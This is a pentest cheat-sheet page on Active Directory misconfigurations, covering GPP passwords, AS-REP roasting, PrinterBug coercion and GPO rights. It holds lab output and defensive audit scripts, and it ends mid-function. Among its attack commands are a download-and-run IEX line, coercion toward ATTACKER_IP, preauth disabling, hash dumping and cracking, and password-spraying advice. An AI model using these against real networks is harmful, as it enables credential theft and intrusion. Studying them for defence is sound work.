# Misconfiguration

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Misconfigured and dangerous logon scripts

{% embed url="<https://offsec.blog/hidden-menace-how-to-identify-misconfigured-and-dangerous-logon-scripts/>" %}

{% embed url="<https://github.com/techspence/ScriptSentry>" %}

```powershell
# Run ScriptSentry and display results on the console
IEX(Invoke-WebRequest 'https://raw.githubusercontent.com/techspence/ScriptSentry/main/Invoke-ScriptSentry.ps1')
Invoke-ScriptSentry

# Run ScriptSentry and save output to a text file
IEX(Invoke-WebRequest 'https://raw.githubusercontent.com/techspence/ScriptSentry/main/Invoke-ScriptSentry.ps1')
Invoke-ScriptSentry | Out-File c:\temp\ScriptSentry.txt

# Run ScriptSentry and save results to separate csv files in the current directory
IEX(Invoke-WebRequest 'https://raw.githubusercontent.com/techspence/ScriptSentry/main/Invoke-ScriptSentry.ps1')
Invoke-ScriptSentry -SaveOutput $true
```

## GPO Misconfiguration

{% embed url="<https://github.com/PShlyundin/GPOHunter>" %}

## PrinterBug

{% embed url="<https://web.archive.org/web/20200919080216/https://github.com/cube0x0/Security-Assessment>" %}

```powershell-session
PS C:\htb> Import-Module .\SecurityAssessment.ps1
PS C:\htb> Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

ComputerName                        Status
------------                        ------
ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL   True
```

### NXC

```shell-session
nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FmLidF6OGe8NdM4ceTM36%2Fimage.png?alt=media&#x26;token=77f04ad1-138c-48c1-aded-f4eddd81b55e" alt=""><figcaption></figcaption></figure>

Source: <https://x.com/al3x_n3ff/status/1770238201598267468>

## DNS

```shell-session
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
```

```shell-session
head records.csv 

type,name,value
A,LOGISTICS,172.16.5.240
AAAA,ForestDnsZones,dead:beef::7442:c49d:e1d7:2691
AAAA,ForestDnsZones,dead:beef::231
A,ForestDnsZones,10.129.202.29
A,ForestDnsZones,172.16.5.240
A,ForestDnsZones,172.16.5.5
AAAA,DomainDnsZones,dead:beef::7442:c49d:e1d7:2691
AAAA,DomainDnsZones,dead:beef::231
A,DomainDnsZones,10.129.202.29
```

{% content-ref url="adidns-spoofing" %}
[adidns-spoofing](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/adidns-spoofing)
{% endcontent-ref %}

## Password in description field

{% embed url="<https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1>" %}

```powershell-session
PS C:\htb> Import-Module .\PowerView.ps1
```

```powershell-session
PS C:\htb> Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

samaccountname description
-------------- -----------
administrator  Built-in account for administering the computer/domain
guest          Built-in account for guest access to the computer/domain
krbtgt         Key Distribution Center Service Account
ldap.agent     *** DO NOT CHANGE ***  3/12/2012: Sunsh1ne4All!
```

## PASSWD\_NOTREQD Field

{% embed url="<https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1>" %}

```powershell-session
PS C:\htb> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

samaccountname                                                         useraccountcontrol
--------------                                                         ------------------
guest                ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
mlowe                                PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
ehamilton                            PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
$725000-9jb50uejje9f                       ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT
nagiosagent                                                PASSWD_NOTREQD, NORMAL_ACCOUNT
```

Then check whether these accounts actually have an empty password: the flag only permits one, it does not guarantee it.

## Credentials in SMB Shares and SYSVOL Scripts

```powershell-session
PS C:\htb> ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts

    Directory: \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts


Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
-a----       11/18/2021  10:44 AM            174 daily-runs.zip                                                       
-a----        2/28/2022   9:11 PM            203 disable-nbtns.ps1                                                    
-a----         3/7/2022   9:41 AM         144138 Logon Banner.htm                                                     
-a----         3/8/2022   2:56 PM            979 reset_local_admin_pass.vbs  
```

## Group Policy Preferences (GPP) Passwords

{% embed url="<https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1>" %}

{% embed url="<https://github.com/ShutdownRepo/Get-GPPPassword>" %}

{% embed url="<https://github.com/p0dalirius/FindGPPPasswords>" %}

`Groups.xml`

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fep7RUR1k3u2FVnRfQrWp%2FPasted%20image%2020240513014754.png?alt=media&#x26;token=22112566-4f2e-498f-9e2f-52de18e8228f" alt=""><figcaption></figcaption></figure>

```shell-session
gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE

Password1
```

Often, GPP passwords are defined for legacy accounts, and you may therefore retrieve and decrypt the password for a locked or deleted account. However, it is worth attempting to password spray internally with this password (especially if it is unique). Password re-use is widespread, and the GPP password combined with password spraying could result in further access.

```shell-session
$ crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [+] Found SYSVOL share
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Searching for Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Usernames: ['guarddesk']
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Domains: ['INLANEFREIGHT.LOCAL']
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Passwords: ['ILFreightguardadmin!']
```

{% content-ref url="../tools/netexec-cme" %}
[netexec-cme](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/netexec-cme)
{% endcontent-ref %}

### Mitigation

The following security controls should be implemented to mitigate a Password in GPP compromise:

* **Remove all GPP passwords.** This eliminates the risk of a Password in GPP compromise.
* **Apply Microsoft’s security patch 2962486 to remove the functionality to create cpasswords.** This security patch prevents the creation of new cpasswords. For more information on the security patch, see Microsoft’s [Security Bulletin MS14-025](https://learn.microsoft.com/en-au/security-updates/SecurityBulletins/2014/ms14-025).

<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03>
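The "remove all GPP passwords" control above needs an inventory first. Added example (Python, not code from the page, Get-GPPPassword or nxc) that walks an exported copy of the `Policies` folder and reports every Preferences item still carrying a `cpassword` attribute, plus `Registry.xml` autologon values like the ones the `gpp_autologin` module found; the XML samples are constructed.

```python
# Added example (not from the page, Get-GPPPassword or nxc): audit an exported copy of
# SYSVOL\<domain>\Policies for GPP items carrying a cpassword and Registry.xml autologon values.
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Preferences files that may hold a cpassword attribute (scope of MS14-025).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
AUTOLOGON_VALUES = {"DefaultUserName", "DefaultPassword", "DefaultDomainName"}

@dataclass
class Finding:
    gpo_guid: str    # {GUID} folder under Policies
    file: str        # Preferences XML file name
    kind: str        # "cpassword" or "autologon"
    name: str        # account name or registry value name
    has_value: bool  # False when the attribute exists but is empty

def gpo_guid_from_path(path: str) -> str:
    """Return the {GUID} policy folder component of a SYSVOL path, or '?'."""
    for part in path.replace("\\", "/").split("/"):
        if part.startswith("{") and part.endswith("}"):
            return part
    return "?"

def scan_xml(path: str, data: bytes) -> list[Finding]:
    """Scan one Preferences XML document that has already been read into memory."""
    findings: list[Finding] = []
    guid, fname = gpo_guid_from_path(path), os.path.basename(path)
    for item in ET.fromstring(data).iter():
        props = item.find("Properties")
        if props is None:
            continue
        cpw = props.get("cpassword")
        if cpw is not None:  # the attribute being present at all is the finding
            who = props.get("userName") or props.get("accountName") or item.get("name", "?")
            findings.append(Finding(guid, fname, "cpassword", who, bool(cpw)))
        if fname == "Registry.xml" and props.get("name") in AUTOLOGON_VALUES:
            findings.append(Finding(guid, fname, "autologon", props.get("name"),
                                    bool(props.get("value"))))
    return findings

def scan_policies_dir(policies_dir: str) -> list[Finding]:
    findings: list[Finding] = []
    for dirpath, _, files in os.walk(policies_dir):  # local copy of the Policies folder
        for f in files:
            if f in GPP_FILES or f == "Registry.xml":
                with open(os.path.join(dirpath, f), "rb") as fh:
                    findings.extend(scan_xml(os.path.join(dirpath, f), fh.read()))
    return findings

# Constructed samples (not real SYSVOL content); the GUID is the one in the page's nxc output.
SAMPLE_PATH = "Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/"
SAMPLE_GROUPS_XML = b"""<Groups>
 <User name="guarddesk" uid="{CONSTRUCTED}">
  <Properties action="U" userName="guarddesk" cpassword="CONSTRUCTED_CPASSWORD_BASE64"/>
 </User>
</Groups>"""
SAMPLE_REGISTRY_XML = b"""<RegistrySettings>
 <Registry name="DefaultPassword">
  <Properties action="U" hive="HKEY_LOCAL_MACHINE" type="REG_SZ" name="DefaultPassword" value="CONSTRUCTED"/>
 </Registry>
</RegistrySettings>"""
SAMPLE_FINDINGS = (scan_xml(SAMPLE_PATH + "Groups/Groups.xml", SAMPLE_GROUPS_XML)
                   + scan_xml(SAMPLE_PATH + "Registry/Registry.xml", SAMPLE_REGISTRY_XML))

if __name__ == "__main__":
    for f in SAMPLE_FINDINGS:
        print(f"[!] {f.gpo_guid} {f.file}: {f.kind} -> {f.name} (value set: {f.has_value})")
```

Point `scan_policies_dir()` at a copy of `\\<dc>\SYSVOL\<domain>\Policies` to run it against a real domain; an empty `cpassword=""` is still reported because the attribute's presence is what the patch prevents.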

## ASREPRoasting

{% hint style="info" %}
*"Do not require Kerberos preauthentication"*
{% endhint %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FvhL0jZxnHaJCPM5ouPH2%2Fimage.png?alt=media&#x26;token=7423d681-d016-49ce-a9de-c94626cdb5d8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FstmB1SkHhB6QuYQIPHSn%2Fdmadc-figure-2-overview-of-as-rep-roasting.png?alt=media&#x26;token=3034c39c-01a5-4eda-b4cd-6c6bef4cd996" alt=""><figcaption></figcaption></figure>

### Without Credentials - Man-In-The-Middle

ASRepCatcher

{% embed url="<https://github.com/Yaxxine7/ASRepCatcher>" %}

```shell-session
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
```

### ASREPRoastable accounts

#### PowerView

```powershell
Get-DomainUser -PreauthNotRequired -Verbose
```

#### AD Module

```powershell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

### Force Disable Kerberos Preauth

{% hint style="success" %}
*With sufficient rights ([GenericWrite or GenericAll](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/acl)) Kerberos preauth can be forcibly disabled*
{% endhint %}

#### PowerView

```powershell
# Check for GenericWrite or GenericAll rights
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
# Disable kerberos preauth for user1
Set-DomainObject -Identity user1 -XOR @{useraccountcontrol=4194304} -Verbose
# Check if user is asreproastable
Get-DomainUser -PreauthNotRequired -Verbose
```
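The `-XOR @{useraccountcontrol=4194304}` call above and the `userAccountControl:1.2.840.113556.1.4.803:=4194304` LDAP clause these tools send both operate on the same bitmask. Added example (Python, not code from the page, PowerView or Rubeus) that decodes the flags, builds the bitwise-AND filter, shows why XOR is a toggle rather than a set, and audits for the DONT_REQ_PREAUTH and PASSWD_NOTREQD flags covered on this page; all account values are constructed.

```python
# Added example (not from the page, PowerView or Rubeus): work with the
# userAccountControl bitmask the way the tools above do, and audit for the two
# flags this page covers. All account values below are constructed.
from __future__ import annotations

# Subset of the ADS_USER_FLAG values (names as PowerView prints them).
UAC_FLAGS = {
    "ACCOUNTDISABLE":       0x00000002,
    "PASSWD_NOTREQD":       0x00000020,
    "NORMAL_ACCOUNT":       0x00000200,
    "DONT_EXPIRE_PASSWORD": 0x00010000,
    "DONT_REQ_PREAUTH":     0x00400000,  # 4194304, the value used with -XOR above
}
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

def decode_uac(value: int) -> list[str]:
    """Names of the flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]

def ldap_filter_for(flag: str) -> str:
    """LDAP clause matching every object with the flag set (what Rubeus/PowerView send)."""
    return f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UAC_FLAGS[flag]})"

def bit_and_filter_matches(value: int, mask: int) -> bool:
    """Semantics of the 1.2.840.113556.1.4.803 rule: every bit in mask is set in value."""
    return value & mask == mask

def toggle_flag(value: int, flag: str) -> int:
    """What Set-DomainObject -XOR does: flip the bit. On an account that already has the
    flag this *clears* it, so audit the current value before relying on XOR."""
    return value ^ UAC_FLAGS[flag]

def audit_accounts(accounts: dict[str, int]) -> dict[str, list[str]]:
    """Report AS-REP roastable accounts and enabled accounts that may have no password."""
    findings: dict[str, list[str]] = {}
    for sam, uac in accounts.items():
        issues = []
        if bit_and_filter_matches(uac, UAC_FLAGS["DONT_REQ_PREAUTH"]):
            issues.append("AS-REP roastable (DONT_REQ_PREAUTH)")
        if bit_and_filter_matches(uac, UAC_FLAGS["PASSWD_NOTREQD"]) \
                and not uac & UAC_FLAGS["ACCOUNTDISABLE"]:
            issues.append("enabled account may have an empty password (PASSWD_NOTREQD)")
        if issues:
            findings[sam] = issues
    return findings

# Constructed sample modelled on the page's output; the values are made up, not real AD data.
SAMPLE_ACCOUNTS = {
    "mmorgan":     0x200 | 0x10000 | 0x400000,  # NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
    "guest":       0x2 | 0x20 | 0x200 | 0x10000,  # disabled, so PASSWD_NOTREQD is not reported
    "mlowe":       0x20 | 0x200 | 0x10000,
    "nagiosagent": 0x20 | 0x200,
    "user1":       0x200,
}

if __name__ == "__main__":
    for sam, issues in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{sam}: {'; '.join(issues)}")
    print(ldap_filter_for("DONT_REQ_PREAUTH"))
    once = toggle_flag(SAMPLE_ACCOUNTS["user1"], "DONT_REQ_PREAUTH")  # preauth now disabled
    twice = toggle_flag(once, "DONT_REQ_PREAUTH")                     # a second XOR re-enables it
    print(decode_uac(once), decode_uac(twice))
```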

#### BloodyAD

```shell-session
bloodyAD --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
```

### ASREPRoast

{% embed url="<https://github.com/HarmJ0y/ASREPRoast>" %}

```powershell
# One user
Get-ASREPHash -UserName victim -Verbose
# Enumerate all asreproastable users
Invoke-ASREPRoast -Verbose
```

### Rubeus

```powershell-session
PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

samaccountname     : mmorgan
userprincipalname  : mmorgan@inlanefreight.local
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
```

```powershell-session
PS C:\htb> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: AS-REP roasting

[*] Target User            : mmorgan
[*] Target Domain          : INLANEFREIGHT.LOCAL

[*] Searching path 'LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(samAccountName=mmorgan))'
[*] SamAccountName         : mmorgan
[*] DistinguishedName      : CN=Matthew Morgan,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
[*] Using domain controller: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL (172.16.5.5)
[*] Building AS-REQ (w/o preauth) for: 'INLANEFREIGHT.LOCAL\mmorgan'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
     $krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:D18650F4F4E0537E0188A6897A478C55$0978822DEC13046712DB7DC03 <SNIP>
```

```shell-session
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt 
```

{% content-ref url="../cracking/hashes" %}
[hashes](https://0xss0rz.gitbook.io/0xss0rz/pentest/cracking/hashes)
{% endcontent-ref %}

### NXC

```shell-session
nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
```

{% embed url="<https://www.netexec.wiki/ldap-protocol/asreproast>" %}

### Kerbrute - No creds, but user list

{% hint style="info" %}
*No credentials needed, only a list of users*
{% endhint %}

```shell-session
$ kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 13:14:17 >  Using KDC(s):
2022/04/01 13:14:17 >  	172.16.5.5:88

2022/04/01 13:14:17 >  [+] VALID USERNAME:	 sbrown@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 jjones@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 tjohnson@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 jwilson@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 bdavis@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 njohnson@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 asanchez@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 dlewis@inlanefreight.local
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 ccruz@inlanefreight.local
2022/04/01 13:14:17 >  [+] mmorgan has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:400d306dda575be3d429aad39ec68a33$8698ee
```

### Impacket - No creds, but user list

{% hint style="info" %}
*No credentials needed, only a username list*
{% endhint %}

```shell-session
$ GetNPUsers.py htb.local/ -dc-ip 192.168.3.203 -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt -request -format hashcat -outputfile asrep.hash -debug |tee getnpusers.log
$ cat getnpusers.log |grep -v 'Client not found in Kerberos database'
```

```shell-session
$ GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users 
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[-] User sbrown@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jjones@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tjohnson@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jwilson@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bdavis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User njohnson@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User asanchez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dlewis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ccruz@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$mmorgan@inlanefreight.local@INLANEFREIGHT.LOCAL:47e0d517f2a5815da8345dd9247a0e3d$b62d45bc3c0f4c306402a205ebdbbc623d77ad016e657337630c70f651451400329545fb634c9d329ed024ef145bdc2afd4af498b2f0092766effe6ae12b3c3beac28e6ded0b542e85d3fe52467945d98a722cb52e2b37325a53829ecf127d10ee98f8a583d7912e6ae3c702b946b65153bac16c97b7f8f2d4c2811b7feba92d8bd99cdeacc8114289573ef225f7c2913647db68aafc43a1c98aa032c123b2c9db06d49229c9de94b4b476733a5f3dc5cc1bd7a9a34c18948edf8c9c124c52a36b71d2b1ed40e081abbfee564da3a0ebc734781fdae75d3882f3d1d68afdb2ccb135028d70d1aa3c0883165b3321e7a1c5c8d7c215f12da8bba9
[-] User rramirez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jwallace@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jsantiago@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set

<SNIP>
```

{% embed url="<https://0xdf.gitlab.io/2020/07/18/htb-sauna.html>" %}

### SharpADWS

{% embed url="<https://github.com/wh0amitz/SharpADWS>" %}

```cmd-session
C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action list

[*] Found users that do not require kerberos preauthentication:
[*]     CN=Bob,CN=Users,DC=corp,DC=local
[*]     CN=Alice,CN=Users,DC=corp,DC=local
[*]     CN=John,CN=Users,DC=corp,DC=local
```

### ASREPRoast to Kerberoast

Once you have identified an ASREPRoastable account, it can be used to request service tickets for any account that has an SPN (Service Principal Name) set.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FC2m5M2GFh81jQCxIHYUt%2F1750265888743.jpg?alt=media&#x26;token=38888248-0d65-44d1-af6d-8c9e8354dcd3" alt=""><figcaption></figcaption></figure>

### Mitigation

The following security control should be implemented to mitigate AS-REP Roasting:

* **Ensure user objects require Kerberos pre-authentication**. AS-REP Roasting is mitigated if all user objects require Kerberos pre-authentication. However, if user objects must be configured to bypass Kerberos pre-authentication, then these user objects should be granted the minimum set of privileges required for them to perform their functions and should not be members of highly privileged security groups, such as Domain Admins. Additionally, set a minimum 30-character password for service accounts or a minimum 15-character password for users, and ensure the password is unique, unpredictable and managed.

<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03>

### Resources

{% embed url="<https://beta.hackndo.com/kerberos-asrep-roasting/>" %}

{% embed url="<https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#as-rep-roasting>" %}

{% embed url="<https://harmj0y.medium.com/roasting-as-reps-e6179a65216b>" %}

{% embed url="<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast>" %}

## Group Policy Object (GPO) Abuse

Use [group3r](https://github.com/Group3r/Group3r), [ADRecon](https://github.com/sense-of-security/ADRecon), [PingCastle](https://www.pingcastle.com/), among others, to audit the security of GPOs in a domain.

Precompiled tools - SharpGPO:

{% embed url="<https://github.com/jakobfriedl/precompiled-binaries/tree/main/LateralMovement/GPOAbuse>" %}

### PowerView

```powershell-session
PS C:\htb> Get-DomainGPO |select displayname

displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
Deny Control Panel Access
Disallow LM Hash
Deny CMD Access
Disable Forced Restarts
Block Removable Media
Disable Guest Account
Service Accounts Password Policy
Logon Banner
Disconnect Idle RDP
Disable NetBIOS
AutoLogon
GuardAutoLogon
Certificate Services
```

### Built-In Cmdlet

```powershell-session
PS C:\htb> Get-GPO -All | Select DisplayName

DisplayName
-----------
Certificate Services
Default Domain Policy
Disable NetBIOS
Disable Guest Account
AutoLogon
Default Domain Controllers Policy
Disconnect Idle RDP
Disallow LM Hash
Deny CMD Access
Block Removable Media
GuardAutoLogon
Service Accounts Password Policy
Logon Banner
Disable Forced Restarts
Deny Control Panel Access
```

### **Enumerating Domain User GPO Rights**

```powershell-session
PS C:\htb> $sid=Convert-NameToSid "Domain Users"
PS C:\htb> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

ObjectDN              : CN={7CA9C789-14CE-46E3-A722-83F4097AF532},CN=Policies,CN=System,DC=INLANEFREIGHT,DC=LOCAL
ObjectSID             :
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, Delete, GenericExecute, WriteDacl,
                        WriteOwner
BinaryLength          : 36
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 983095
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-513
AceType               : AccessAllowed
AceFlags              : ObjectInherit, ContainerInherit
IsInherited           : False
InheritanceFlags      : ContainerInherit, ObjectInherit
PropagationFlags      : None
AuditFlags            : None
```

```powershell-session
PS C:\htb> Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

DisplayName      : Disconnect Idle RDP
DomainName       : INLANEFREIGHT.LOCAL
Owner            : INLANEFREIGHT\Domain Admins
Id               : 7ca9c789-14ce-46e3-a722-83f4097af532
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 10/28/2021 3:34:07 PM
ModificationTime : 4/5/2022 6:54:25 PM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 0, SysVol Version: 0
WmiFilter        :
```
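The `AccessMask 983095` in the Get-ObjectAcl output above is what PowerShell renders as the `ActiveDirectoryRights` list. Added example (Python, not code from the page or PowerView) that reproduces that decoding and then flags GPO ACEs where a broad principal such as Domain Users (RID 513) holds a write right; the sample ACEs are constructed from the page's output.

```python
# Added example (not from the page or PowerView): decode the AccessMask that Get-ObjectAcl
# prints into the ActiveDirectoryRights names PowerShell shows, then flag GPO ACEs that
# give broad principals write access. Sample ACEs are constructed from the page's output.
from __future__ import annotations

RIGHTS = {  # System.DirectoryServices.ActiveDirectoryRights values
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000, "GenericExecute": 0x20004,
    "GenericWrite": 0x20028, "GenericRead": 0x20094, "GenericAll": 0xF01FF,
}
# Rights that let the holder change what a GPO does, or who controls it.
WRITE_RIGHTS = RIGHTS["WriteProperty"] | RIGHTS["WriteDacl"] | RIGHTS["WriteOwner"]
# Principals every domain user or machine is a member of.
BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users"}
BROAD_RIDS = {513: "Domain Users", 514: "Domain Guests", 515: "Domain Computers"}

def decode_access_mask(mask: int) -> list[str]:
    """Greedy decomposition as .NET's Flags ToString does it: try the largest value
    first against what is still unexplained, then list matches in ascending order."""
    matched, remaining = [], mask
    for name, bits in sorted(RIGHTS.items(), key=lambda kv: kv[1], reverse=True):
        if remaining & bits == bits:
            matched.append((bits, name))
            remaining &= ~bits
    return [name for _, name in sorted(matched)]

def principal_label(sid: str) -> str | None:
    """Name the principal if every user/computer belongs to it, else None."""
    if sid in BROAD_SIDS:
        return BROAD_SIDS[sid]
    rid = sid.rsplit("-", 1)[-1]
    if sid.startswith("S-1-5-21-") and rid.isdigit() and int(rid) in BROAD_RIDS:
        return BROAD_RIDS[int(rid)]
    return None

def risky_gpo_aces(aces: list[dict]) -> list[str]:
    """AccessAllowed ACEs on GPO objects where a broad principal holds a write right."""
    report = []
    for ace in aces:
        who = principal_label(ace["SecurityIdentifier"])
        if ace["AceQualifier"] != "AccessAllowed" or who is None:
            continue
        if not ace["AccessMask"] & WRITE_RIGHTS:
            continue
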